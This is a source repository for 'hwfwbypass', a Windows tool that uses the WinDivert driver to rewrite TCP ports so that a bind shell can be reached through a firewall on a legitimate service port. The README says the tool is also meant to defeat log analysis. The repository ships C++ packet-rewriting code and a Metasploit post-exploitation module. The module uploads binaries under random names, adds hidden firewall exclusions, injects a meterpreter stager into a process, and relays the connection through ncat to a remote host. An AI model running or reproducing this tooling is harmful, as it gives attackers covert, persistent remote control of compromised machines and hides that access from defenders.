README.md
hwfwbypass
==========
This program can be used to bypass/fool hardware firewalls.
The program has to be started with administrator level privileges on a server.
When a client connects from the TCP source port specified in the client_sourceport parameter,
to the TCP destination port original_dstport. the kernel driver will redirect the traffic to the
new_dstport on the server. 
This trick is useful when the restrictive firewall is blocking bind shells,
or thwarting log analysis, because all traffic will use legitimate service port.


usage: hwfwbypass.exe client_sourceport original_dstport new_dstport [disablechecksum] [debug]
examples:
hwfwbypass.exe 1337 3389 31337 
hwfwbypass.exe 1337 3389 31337 disablechecksum debug

disablechecksum: when this parameter is set, it will disable the calculation of the TCP or IP checksums. 
It is useful when the network adapter driver does the checksum calculations (offload).

debug: print debug info on the screen about the original and modified traffic.


Compilation notes:
Download http://reqrypt.org/download/WinDivert-1.1.4-MSVC.zip or later from http://reqrypt.org/windivert.html 
Update packages in windivert_32_lib or windivert_x64_lib
Copy the compiled windivert files (dll, sys) to the compiled hwfwbypass directory (32/64, debug/release)


===============================================================
Known problems, errors:

error: failed to open the WinDivert device (5)

solution: Start the executable with administrator level privileges. Check if the DLL and SYS file is in the same directory. 

-------------------

error: msvcrxxx.dll is missing:

solution:
Download the corresponding Microsoft Visual Studio redistributable files, and either install it, or put the DLL's in the 
same directory where the hwfwbypass binary is.
msvcr110.dll -> Visual studio 2012
msvcr120.dll -> Visual studio 2013
Always install the same architecture (32/64 bit) of the DLL as it is the binary.
Additional information: the windivert dll file has been compiled with VS2012, and hwfwbypass has been compiled with VS2013


===============================================================
Limitations:

1. The bind shell should listen on the same interface where the service with original_dstport listens. The driver can't forward the traffic to the "non-existent" loopback interface.

2. Only TCP traffic is supported at the moment.



CHANGELOG.txt

v1.01 Release - 27 September, 2014
Bugfix Release:

Bug#1: TCP option headers were not correctly copied, thus the application failed to work in environments where those headers were essential
Bug#2: The 32 bit compiled binary was not correctly linked to the same dll files as in the directory, thus failed to work.


------------------------------------------------
v1.0 Initial Version Released - August 8, 2014

source/hwfwbypass/hwfwbypass.cpp
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "stdafx.h"
#include "windivert.h"

#define MAXBUF  0xFFFF
#define INVALID 0

/*
* Pre-fabricated packets.
*/
typedef struct
{
	WINDIVERT_IPHDR  ip;
	WINDIVERT_TCPHDR tcp;
} PACKET, *PPACKET;

typedef struct
{
	PACKET header;
	UINT8 data[];
} DATAPACKET, *PDATAPACKET;

typedef struct
{
	WINDIVERT_IPHDR ip;
	WINDIVERT_TCPHDR tcp;
} TCPPACKET, *PTCPPACKET;



/*
* Prototypes.
*/
static void PacketIpInit(PWINDIVERT_IPHDR packet);
static void PacketIpTcpInit(PTCPPACKET packet);
static void PacketInit(PPACKET packet);
static void DebugPrint(PVOID payload, PDATAPACKET divert, PTCPPACKET pack, HANDLE console, UINT payload_len, UINT i, UINT packet_len,
	WINDIVERT_ADDRESS addr, unsigned char packet[MAXBUF]);
static void DebugPrintPacket1(PTCPPACKET pack, HANDLE console);
static void DebugPrintPacket2(PTCPPACKET pack, HANDLE console, WINDIVERT_ADDRESS addr,
	PWINDIVERT_IPHDR ip_header, UINT i, PWINDIVERT_TCPHDR tcp_header, UINT packet_len, unsigned char packet[MAXBUF]);

/*
* Entry.
*/
int __cdecl main(int argc, char **argv)
{
	HANDLE handle, console;
	UINT i = 0;
	int j;
	INT16 priority = 0;
	unsigned char packet[MAXBUF];
	UINT packet_len;
	WINDIVERT_ADDRESS addr;
	PWINDIVERT_IPHDR ip_header;
	PWINDIVERT_IPV6HDR ipv6_header;
	PWINDIVERT_ICMPHDR icmp_header;
	PWINDIVERT_ICMPV6HDR icmpv6_header;
	PWINDIVERT_TCPHDR tcp_header;
	PWINDIVERT_UDPHDR udp_header;
	UINT32 orig_client_ip = 0;
	UINT32 orig_server_ip = 0;
	PVOID payload;
	UINT payload_len;
	PDATAPACKET divert = 0;
	UINT16 divert_len;
	TCPPACKET pack0;
	PTCPPACKET pack = &pack0;
	BOOLEAN debug;
	BOOLEAN disablechecksum;
	char filter[210];
	int cx;

	debug = FALSE;
	disablechecksum = FALSE;

	// Check arguments.
	switch (argc)
	{

	case 4:
		break;

	case 5:
		if (strcmp(argv[4], "disablechecksum") == 0){
			disablechecksum = TRUE;
		}
		else if (strcmp(argv[4], "debug") == 0){
			debug = TRUE;
		}
		break;

	case 6:
		if (strcmp(argv[4], "disablechecksum") == 0){
			disablechecksum = TRUE;
		}

		else if (strcmp(argv[4], "debug") == 0){
			debug = TRUE;
		}

		if (strcmp(argv[5], "disablechecksum") == 0){
			disablechecksum = TRUE;
		}
		else if (strcmp(argv[5], "debug") == 0){
			debug = TRUE;
		}
		break;

	default:
		fprintf(stderr, "usage: %s client_sourceport original_dstport new_dstport [disablechecksum] [debug]\n",
			argv[0]);
		fprintf(stderr, "examples:\n");
		fprintf(stderr, "\t%s 1337 3389 31337 \n", argv[0]);
		fprintf(stderr, "\t%s 1337 3389 31337 disablechecksum debug\n",
			argv[0]);
		exit(EXIT_FAILURE);
	}

	// Get console for pretty colors.
	console = GetStdHandle(STD_OUTPUT_HANDLE);

	// Divert traffic matching the filter:
	cx = sprintf_s(filter, sizeof(filter),
		"((inbound and tcp.SrcPort == %s and tcp.DstPort == %s )"
		" or (outbound and tcp.SrcPort == %s and tcp.DstPort == %s ))",
		argv[1], argv[2], argv[3], argv[1]);

	// display current filter
	if (debug){
		for (j = 1; j < argc; j++) {
			printf("\narg%d=%s", j, argv[j]);
		}
		printf("\nUsed filter: %s\n", filter);
	}

	//get handle
	handle = WinDivertOpen(filter, WINDIVERT_LAYER_NETWORK, priority,
		0);

	// if handle is not valid
	if (handle == INVALID_HANDLE_VALUE)
	{
		if (GetLastError() == ERROR_INVALID_PARAMETER)
		{
			fprintf(stderr, "error: filter syntax error\n");
			exit(EXIT_FAILURE);
		}
		fprintf(stderr, "error: failed to open the WinDivert device (%d)\n",
			GetLastError());
		exit(EXIT_FAILURE);
	}

	// Max-out the packet queue:
	if (!WinDivertSetParam(handle, WINDIVERT_PARAM_QUEUE_LEN, 8192))
	{
		fprintf(stderr, "error: failed to set packet queue length (%d)\n",
			GetLastError());
		exit(EXIT_FAILURE);
	}
	if (!WinDivertSetParam(handle, WINDIVERT_PARAM_QUEUE_TIME, 2048))
	{
		fprintf(stderr, "error: failed to set packet queue time (%d)\n",
			GetLastError());
		exit(EXIT_FAILURE);
	}

	// Main loop:
	while (TRUE)
	{
		// Read a matching packet.
		if (!WinDivertRecv(handle, packet, sizeof(packet), &addr, &packet_len))
		{
			fprintf(stderr, "warning: failed to read packet (%d)\n",
				GetLastError());
			continue;
		}

		//printf("Packet len: %d\n", packet_len);
		// Print info about the matching packet.
		WinDivertHelperParsePacket(packet, packet_len, &ip_header,
			&ipv6_header, &icmp_header, &icmpv6_header, &tcp_header,
			&udp_header, &payload, &payload_len);

		if (ip_header == NULL && ipv6_header == NULL)
		{
			fprintf(stderr, "warning: junk packet\n");
		}

		// show content of original packets
		if (debug){
			printf("Original packets:\n\t");
			DebugPrint(payload, divert, pack, console, payload_len, i, packet_len, addr, packet);
		}

		// save SRC and DST IP for further use
		if (tcp_header->Syn && !tcp_header->Ack)
		{
			orig_client_ip = ip_header->SrcAddr;
			orig_server_ip = ip_header->DstAddr;
			if (debug){
				printf("%s", "This is a SYN packet, storing src and dst ip.\n");
			}
		}

		// packet without data
		if (payload == NULL) {
			PacketIpTcpInit(pack);
			pack->ip.SrcAddr = ip_header->SrcAddr;
			pack->ip.DstAddr = ip_header->DstAddr;
			pack->ip.TTL = ip_header->TTL;
			pack->ip.Protocol = ip_header->Protocol;
			pack->ip.Version = ip_header->Version;
			pack->ip.TOS = ip_header->TOS;
			pack->ip.Id = ip_header->Id;
			pack->ip.FragOff0 = ip_header->FragOff0;
			pack->ip.HdrLength = ip_header->HdrLength;
			pack->ip.Length = ip_header->Length;
			pack->ip.Checksum = ip_header->Checksum;

			//when traffic from client to backdoor server
			if (ntohs(tcp_header->DstPort) == atoi(argv[2]))
			{
				//printf("%s", "C->S\n");
				pack->tcp.SrcPort = tcp_header->SrcPort;
				pack->tcp.DstPort = htons(atoi(argv[3]));
			}

			//when traffic from backdoor server to client
			if (ntohs(tcp_header->DstPort) == atoi(argv[1]))
			{
				pack->tcp.SrcPort = htons(atoi(argv[2]));
				pack->tcp.DstPort = tcp_header->DstPort;

				pack->ip.SrcAddr = orig_server_ip;
				pack->ip.DstAddr = orig_client_ip;
			}

			pack->tcp.SeqNum = tcp_header->SeqNum;
			pack->tcp.AckNum = tcp_header->AckNum;
			pack->tcp.HdrLength = tcp_header->HdrLength;
			pack->tcp.Fin = tcp_header->Fin;
			pack->tcp.Ack = tcp_header->Ack;
			pack->tcp.Rst = tcp_header->Rst;
			pack->tcp.Syn = tcp_header->Syn;
			pack->tcp.Psh = tcp_header->Psh;
			pack->tcp.Urg = tcp_header->Urg;
			pack->tcp.Window = tcp_header->Window;
			pack->tcp.Reserved1 = tcp_header->Reserved1;
			pack->tcp.Reserved2 = tcp_header->Reserved2;
			pack->tcp.Checksum = tcp_header->Checksum;

			if (!disablechecksum){
				WinDivertHelperCalcChecksums((PVOID)pack, packet_len,
					0);
			}

		}

		// packet with data
		else {
			// calculate size
			divert_len = sizeof(DATAPACKET)+(UINT16)payload_len;
			// allocate memory for packet
			divert = (PDATAPACKET)calloc(1, divert_len);
			if (divert == NULL)
			{
				fprintf(stderr, "error: memory allocation failed\n");
				exit(EXIT_FAILURE);
			}
			PacketInit(&divert->header);

			divert->header.ip.SrcAddr = ip_header->SrcAddr;
			divert->header.ip.DstAddr = ip_header->DstAddr;
			divert->header.ip.TTL = ip_header->TTL;
			divert->header.ip.Protocol = ip_header->Protocol;
			divert->header.ip.Version = ip_header->Version;
			divert->header.ip.TOS = ip_header->TOS;
			divert->header.ip.Length = htons(divert_len);
			divert->header.ip.HdrLength = ip_header->HdrLength;
			divert->header.ip.Id = ip_header->Id;
			divert->header.ip.FragOff0 = ip_header->FragOff0;
			divert->header.ip.Checksum = ip_header->Checksum;

			//when traffic from client to backdoor server
			if (ntohs(tcp_header->DstPort) == atoi(argv[2]))
			{
				divert->header.tcp.SrcPort = tcp_header->SrcPort;
				divert->header.tcp.DstPort = htons(atoi(argv[3]));
			}

			//when traffic from backdoor server to client
			if (ntohs(tcp_header->DstPort) == atoi(argv[1]))
			{
				divert->header.tcp.SrcPort = htons(atoi(argv[2]));
				divert->header.tcp.DstPort = tcp_header->DstPort;

				divert->header.ip.SrcAddr = orig_server_ip;
				divert->header.ip.DstAddr = orig_client_ip;
			}

			divert->header.tcp.SeqNum = tcp_header->SeqNum;
			divert->header.tcp.AckNum = tcp_header->AckNum;
			divert->header.tcp.Fin = tcp_header->Fin;
			divert->header.tcp.Ack = tcp_header->Ack;
			divert->header.tcp.Rst = tcp_header->Rst;
			divert->header.tcp.Syn = tcp_header->Syn;
			divert->header.tcp.Psh = tcp_header->Psh;
			divert->header.tcp.Urg = tcp_header->Urg;
			divert->header.tcp.Window = tcp_header->Window;
			divert->header.tcp.Checksum = tcp_header->Checksum;
			divert->header.tcp.Reserved1 = tcp_header->Reserved1;
			divert->header.tcp.Reserved2 = tcp_header->Reserved2;

			if (payload != NULL) {
				memcpy(divert->data, payload, payload_len);
			}

			if (!disablechecksum){
				WinDivertHelperCalcChecksums((PVOID)divert, divert_len,
					0);
			}
		}

		// show content of the modified packets
		if (debug){
			printf("Modified packets:\n\t");
			DebugPrint(payload, divert, pack, console, payload_len, i, packet_len, addr, packet);
		}

		// packet without data
		if (payload == NULL){
			if (!WinDivertSend(handle, (PVOID)pack, packet_len, &addr, NULL))
			{
				fprintf(stderr, "warning: failed to reinject packet (%d)\n",
					GetLastError());
			}
		}

		//packet with data
		else {
			// Re-inject the modified packet.
			if (!WinDivertSend(handle, (PVOID)divert, divert_len, &addr, NULL))
			{
				fprintf(stderr, "warning: failed to reinject packet (%d)\n",
					GetLastError());
			}

			free(divert);
		}

		putchar('\n');
		SetConsoleTextAttribute(console,
			FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
	}
}


static void PacketIpInit(PWINDIVERT_IPHDR packet)
{
	memset(packet, 0, sizeof(WINDIVERT_IPHDR));
	packet->Version = 4;
	packet->HdrLength = sizeof(WINDIVERT_IPHDR) / sizeof(UINT32);
	packet->Id = ntohs(0xDEAD);
	packet->TTL = 64;
}

/*
* Initialize a TCPPACKET.
*/
static void PacketIpTcpInit(PTCPPACKET packet)
{
	memset(packet, 0, sizeof(TCPPACKET));
	PacketIpInit(&packet->ip);
	packet->ip.Length = htons(sizeof(TCPPACKET));
	packet->ip.Protocol = IPPROTO_TCP;
	packet->tcp.HdrLength = sizeof(WINDIVERT_TCPHDR) / sizeof(UINT32);
}


static void PacketInit(PPACKET packet)
{
	memset(packet, 0, sizeof(PACKET));
	packet->ip.Version = 4;
	packet->ip.HdrLength = sizeof(WINDIVERT_IPHDR) / sizeof(UINT32);
	packet->ip.Length = htons(sizeof(PACKET));
	packet->ip.TTL = 64;
	packet->ip.Protocol = IPPROTO_TCP;
	packet->tcp.HdrLength = sizeof(WINDIVERT_TCPHDR) / sizeof(UINT32);
}

static void DebugPrint(PVOID payload, PDATAPACKET divert, PTCPPACKET pack, HANDLE console,
	UINT payload_len, UINT i, UINT packet_len, WINDIVERT_ADDRESS addr, unsigned char packet[MAXBUF]){
	PWINDIVERT_IPHDR ip_header;
	PWINDIVERT_IPV6HDR ipv6_header;
	PWINDIVERT_ICMPHDR icmp_header;
	PWINDIVERT_ICMPV6HDR icmpv6_header;
	PWINDIVERT_TCPHDR tcp_header;
	PWINDIVERT_UDPHDR udp_header;
	//UINT packet_len;

	// packet without data
	if (payload == NULL){
		DebugPrintPacket1((PTCPPACKET)pack, console);
	}

	// packet with data
	else {
		//todo call with divert
		WinDivertHelperParsePacket(divert, packet_len, &ip_header,
			&ipv6_header, &icmp_header, &icmpv6_header, &tcp_header,
			&udp_header, &payload, &payload_len);

		DebugPrintPacket2((PTCPPACKET)divert, console, addr,
			ip_header, i, tcp_header, packet_len, packet);
		printf("This is data section only!\n");
		for (i = 0; i < payload_len; i++)
		{
			if (i % 40 == 0)
			{
				printf(":\n\t");
			}
			if (isprint(divert->data[i]))
			{
				putchar(divert->data[i]);
			}
			else
			{
				putchar('.');
			}
		}
		putchar('\n');
		SetConsoleTextAttribute(console,
			FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
	}
}

static void DebugPrintPacket1(PTCPPACKET pack, HANDLE console){
	UINT8 *src_addr = (UINT8 *)&pack->ip.SrcAddr;
	UINT8 *dst_addr = (UINT8 *)&pack->ip.DstAddr;

	SetConsoleTextAttribute(console,
		FOREGROUND_GREEN | FOREGROUND_RED);
	printf("IPv4 [Version=%u HdrLength=%u TOS=%u Length=%u Id=0x%.4X "
		"TTL=%u Protocol=%u "
		"Checksum=0x%.4X SrcAddr=%u.%u.%u.%u DstAddr=%u.%u.%u.%u]\n",
		pack->ip.Version, pack->ip.HdrLength,
		ntohs(pack->ip.TOS), ntohs(pack->ip.Length),
		ntohs(pack->ip.Id), pack->ip.TTL,
		pack->ip.Protocol, ntohs(pack->ip.Checksum),
		src_addr[0], src_addr[1], src_addr[2], src_addr[3],
		dst_addr[0], dst_addr[1], dst_addr[2], dst_addr[3]);


	SetConsoleTextAttribute(console, FOREGROUND_GREEN);
	printf("TCP [SrcPort=%u DstPort=%u SeqNum=%u AckNum=%u "
		"HdrLength=%u Reserved1=%u Reserved2=%u Urg=%u Ack=%u "
		"Psh=%u Rst=%u Syn=%u Fin=%u Window=%u Checksum=0x%.4X "
		"UrgPtr=%u]\n",
		ntohs(pack->tcp.SrcPort), ntohs(pack->tcp.DstPort),
		ntohl(pack->tcp.SeqNum), ntohl(pack->tcp.AckNum),
		pack->tcp.HdrLength, pack->tcp.Reserved1,
		pack->tcp.Reserved2, pack->tcp.Urg, pack->tcp.Ack,
		pack->tcp.Psh, pack->tcp.Rst, pack->tcp.Syn,
		pack->tcp.Fin, ntohs(pack->tcp.Window),
		ntohs(pack->tcp.Checksum), ntohs(pack->tcp.UrgPtr));
	putchar('\n');
	SetConsoleTextAttribute(console,
		FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
}

static void DebugPrintPacket2(PTCPPACKET pack, HANDLE console, WINDIVERT_ADDRESS addr,
	PWINDIVERT_IPHDR ip_header, UINT i, PWINDIVERT_TCPHDR tcp_header, UINT packet_len, unsigned char packet[MAXBUF]){
	// Dump packet info: 
	putchar('\n');
	SetConsoleTextAttribute(console, FOREGROUND_RED);
	printf("Packet [Direction=%u IfIdx=%u SubIfIdx=%u]\n",
		addr.Direction, addr.IfIdx, addr.SubIfIdx);

	if (ip_header != NULL)
	{
		UINT8 *src_addr = (UINT8 *)&ip_header->SrcAddr;
		UINT8 *dst_addr = (UINT8 *)&ip_header->DstAddr;
		SetConsoleTextAttribute(console,
			FOREGROUND_GREEN | FOREGROUND_RED);
		printf("IPv4 [Version=%u HdrLength=%u TOS=%u Length=%u Id=0x%.4X "
			"TTL=%u Protocol=%u "
			"Checksum=0x%.4X SrcAddr=%u.%u.%u.%u DstAddr=%u.%u.%u.%u]\n",
			ip_header->Version, ip_header->HdrLength,
			ntohs(ip_header->TOS), ntohs(ip_header->Length),
			ntohs(ip_header->Id), ip_header->TTL,
			ip_header->Protocol, ntohs(ip_header->Checksum),
			src_addr[0], src_addr[1], src_addr[2], src_addr[3],
			dst_addr[0], dst_addr[1], dst_addr[2], dst_addr[3]);
	}

	if (tcp_header != NULL)
	{
		SetConsoleTextAttribute(console, FOREGROUND_GREEN);
		printf("TCP [SrcPort=%u DstPort=%u SeqNum=%u AckNum=%u "
			"HdrLength=%u Reserved1=%u Reserved2=%u Urg=%u Ack=%u "
			"Psh=%u Rst=%u Syn=%u Fin=%u Window=%u Checksum=0x%.4X "
			"UrgPtr=%u]\n",
			ntohs(tcp_header->SrcPort), ntohs(tcp_header->DstPort),
			ntohl(tcp_header->SeqNum), ntohl(tcp_header->AckNum),
			tcp_header->HdrLength, tcp_header->Reserved1,
			tcp_header->Reserved2, tcp_header->Urg, tcp_header->Ack,
			tcp_header->Psh, tcp_header->Rst, tcp_header->Syn,
			tcp_header->Fin, ntohs(tcp_header->Window),
			ntohs(tcp_header->Checksum), ntohs(tcp_header->UrgPtr));
	}
	SetConsoleTextAttribute(console, FOREGROUND_RED | FOREGROUND_BLUE);

	for (i = 0; i < packet_len; i++)
	{
		if (i % 30 == 0)
		{
			printf("\n\t");
		}
		printf("%02x", packet[i]);
	}
	putchar('\n');
	SetConsoleTextAttribute(console,
		FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
}

metasploit/modules/post/windows/manage/hwfwbypass.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
require 'msf/core/exploit/exe'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::EXE
  include Post::File
  include Post::Windows::Priv
  include Post::Common

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Post Bypass Hardware Firewall',
      'Description'   => %q{
        This module will bypass hardware firewalls by using a signed network filter driver at 
        the Windows kernel level. The driver checks incoming traffic from special source port 
        a fixed destination port, and redirects this traffic to another destination port.

	Only 32 bit meterpreter supported at the moment.
        
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
          'Zoltan Balazs <zoltan1.balazs[at]gmail.com>',
          'basil <basil[at]reqrypt.org>',
        ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
      ],
      'DefaultTarget' => 0,
      'References'    => [
        [ 'URL', 'https://github.com/MRGEffitas/hwfwbypass/' ],
        [ 'URL', 'http://http://reqrypt.org/windivert.html' ],
      ],
      'DisclosureDate'=> "Aug 8 2014"
    ))
    register_options(
      [
        OptInt.new('SRCPORT',  [true,  'The client source port', 1337]),
        OptInt.new('ORIGDSTPORT',[true, 'The original destination port, the client connects to this port', 3389]),
        OptInt.new('NEWDSTPORT',[true,  'The new destination port, if the module detects TCP traffic from SRCPORT to ORIGDSTPORT,
					  the module rewrites the destination TCP port to NEWDSTPORT', 31337]),
        OptInt.new('LPORT_CONNECT',[true,'The LPORT to destination bind shell, set same as ORIGDSTPORT', 3389]),
        OptInt.new('LPORT',[true,'The LPORT for the destination bind shell, set same as NEWDSTPORT', 31337]),
        OptInt.new('PID',[false,'The process PID to inject meterpreter',]),

        OptString.new('NEWPAYLOAD',[true,'Meterpreter payload to be used, always use bind meterpreter, and choose x86 or x64 wisely', 'windows/meterpreter/bind_tcp']),
        OptBool.new('HANDLER',   [true, 'Start new multi/handler job on local box.', true]),
        OptString.new('RHOST',[true, 'Remote host to connect the new shell',]),

      ], self.class)

    register_advanced_options(
      [
        OptString.new('PROCESSNAME', [false, 'Inject meterpreter into this process', 'c:\\windows\\syswow64\\notepad.exe'])
      ],self.class)
  end

  def check_permissions!
    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Exploit::Failure::NoAccess, "Cannot hwfwbypass from Low Integrity Level")
    end

  end

  def exploit 
    validate_environment!

    check_permissions!

    upload_binaries!

    if sysinfo["Architecture"] =~ /x64/i
        print_error( "64 bit environment detected, fail back to 32 bit meterpreter")
        syspath = session.fs.file.expand_path("%SystemRoot%") + "\\syswow64\\"
	payload = "windows/meterpreter/bind_tcp" 
	#payload = "windows/x64/meterpreter/bind_tcp"
      else
        payload = "windows/meterpreter/bind_tcp"
        syspath = session.fs.file.expand_path('%systemroot%') + "\\system32\\"
      end	

    print_status("Executing uploaded files")
    # execute the hwfwbypass binaries
    cmd =  "cmd.exe /c start /d#{expand_path("%TEMP%")} /b  #{path_bypass_exe} #{datastore['SRCPORT']} #{datastore['ORIGDSTPORT']} #{datastore['NEWDSTPORT']}"
    print_status(cmd)
    r = session.sys.process.execute( cmd, nil,{'Hidden' => true})

    print_status("Add exclusion to firewall")
    #Windows firewall add file to exclusion
    cmd =  "#{syspath}cmd.exe /c #{syspath}netsh advfirewall firewall add rule name=MyApplication3 dir=in action=allow program=\"#{path_payload}\" enable=yes profile=domain "
    r = session.sys.process.execute( cmd, nil,{'Hidden' => true})

    cmd =  "#{syspath}cmd.exe /c #{syspath}netsh advfirewall firewall add rule name=MyApplication3 dir=in action=allow program=\"#{path_payload}\" enable=yes profile=public "
    r = session.sys.process.execute( cmd, nil,{'Hidden' => true})

    cmd =  "#{syspath}cmd.exe /c #{syspath}netsh advfirewall firewall add rule name=MyApplication3 dir=in action=allow program=\"#{path_payload}\" enable=yes profile=private "
    r = session.sys.process.execute( cmd, nil,{'Hidden' => true})

    print_status("Firewall exclusion added")
    print_status("Executing meterpreter bind shell")
    pid = nil
    pid = datastore['PID']

    #execute the meterpreter payload
    if pid!=0
      pl = create_payload(payload,datastore['LPORT'])
      inject(pid,pl)
      select(nil, nil, nil, 5)
    else
    # if no PID we create a process to host the Meterpreter session
      print_status("Starting process to host payload")
      pl = create_payload(payload,datastore['LPORT'])
      pid_num = start_proc(datastore['PROCESSNAME'])
      inject(pid_num,pl)
      select(nil, nil, nil, 5)
    end

    if datastore['HANDLER']
      print_status("Starting Ncat")
      start_ncat(datastore['LPORT_CONNECT'],datastore['SRCPORT'],datastore['RHOST'],datastore['ORIGDSTPORT'])
      print_status("Start handlers")
      create_multi_handler(payload,datastore['LPORT_CONNECT'],'127.0.0.1')
    end
  end

  def path_bypass_exe
    @bypass_path_exe ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.exe"
  end

  def path_bypass_driver
    if sysinfo["Architecture"] =~ /x64/i
      @bypass_path_driver ||= "#{expand_path("%TEMP%")}\\WinDivert64.sys"
    else
      @bypass_path_driver ||= "#{expand_path("%TEMP%")}\\WinDivert32.sys"
    end
  end


  def path_payload
    @payload_path ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.exe"
  end

  def upload_binaries!
    print_status("Uploading the driver files to the filesystem....")

    #
    # Generate payload and random names for upload
    #
    #datastore['LPORT'] = 31337
    if sysinfo["Architecture"] =~ /x64/i
	payload= "windows/meterpreter/bind_tcp"
        path = ::File.join(Msf::Config.data_directory, "post/hwfwbypass/64")
        driver = ::File.join(path, "WinDivert64.sys")

    else
        payload= "windows/meterpreter/bind_tcp"
        path = ::File.join(Msf::Config.data_directory, "post/hwfwbypass/32")
        driver = ::File.join(path, "WinDivert32.sys")

    end
    bpexe = ::File.join(path, "hwfwbypass.exe")
    windivert_dll = ::File.join(path, "WinDivert.dll")
    msvcr110_dll = ::File.join(path, "msvcr110.dll")
    msvcr120_dll = ::File.join(path, "msvcr120.dll")
    print_status("Uploading the HW FW bypass executable and driver to the filesystem...")

    begin
      #
      # Upload HW FW bypass to the filesystem
      #
      upload_file("#{path_bypass_exe}", bpexe)
      print_status("HW FW Bypass (#{path_bypass_exe}) executable uploaded..")
      upload_file("#{expand_path("%TEMP%")}\\WinDivert.dll", windivert_dll)
      print_status("#{expand_path("%TEMP%")}\\WinDivert.dll uploaded")
      upload_file("#{expand_path("%TEMP%")}\\msvcr110.dll", msvcr110_dll)
      print_status("#{expand_path("%TEMP%")}\\msvcr110.dll uploaded")
      upload_file("#{expand_path("%TEMP%")}\\msvcr120.dll", msvcr120_dll)
      print_status("#{expand_path("%TEMP%")}\\msvcr120.dll uploaded")
      upload_file("#{path_bypass_driver}", driver)
      print_status("WinDivert driver (#{path_bypass_driver}) uploaded..")
    rescue ::Exception => e
      print_error("Error uploading file : #{e.class} #{e}")
    end
  end

  def validate_environment!
    #
    # Verify use against Vista+
    #
    winver = sysinfo["OS"]

    unless winver =~ /Windows Vista|Windows 2008|Windows [78]|Windows 2012/
      fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not compatible.")
    end
    print_status("Compatible #{winver} found.")
  end

  def create_multi_handler(payload_to_inject,lport,rhost)
    print_status("Starting connection handler at port #{lport} for #{payload_to_inject} to #{rhost}")
    mul = client.framework.exploits.create("multi/handler")
    mul.datastore['WORKSPACE'] = session.workspace
    mul.datastore['PAYLOAD']   = payload_to_inject
    mul.datastore['RHOST']     = rhost
    mul.datastore['LPORT']     = lport
    mul.datastore['EXITFUNC']  = 'process'
    mul.datastore['ExitOnSession'] = false

    mul.exploit_simple(
      'Payload'        => mul.datastore['PAYLOAD'],
      'RunAsJob'       => true
    )
    print_good("Multi/Handler started!")
  end

  def create_payload(payload_type,lport)
    print_status("Creating a bind meterpreter stager: LPORT=#{lport}")
    pay = client.framework.payloads.create(payload_type)
    pay.datastore['LPORT'] = lport
    return pay
  end

  def inject(target_pid, payload_to_inject)
    print_status("Injecting meterpreter into process ID #{target_pid}")
    begin
      host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
      raw = payload_to_inject.generate
      mem = host_process.memory.allocate(raw.length + (raw.length % 1024))

      print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
      print_status("Writing the stager into memory...")
      host_process.memory.write(mem, raw)
      host_process.thread.create(mem, 0)
      print_good("Successfully injected Meterpreter in to process: #{target_pid}")
    rescue::Exception => e
      print_error("Failed to Inject Payload to #{target_pid}!")
      print_error(e.message)
    end
  end

  def start_ncat(locallistenport,localsourceport,rhost,rport)
   print_status("Starting ncat locally")
   cmd = "ncat -l #{locallistenport} -c \"ncat -p #{localsourceport} #{rhost} #{rport}\" \&"
   print_status(cmd)
   ::IO.popen(cmd, "rb")
  end

  def start_proc(proc_name)
    print_good("Starting process to house Meterpreter Session.")
    proc = client.sys.process.execute(proc_name, nil, {'Hidden' => true })
    print_good("Process created with pid #{proc.pid}")
    return proc.pid
  end
end

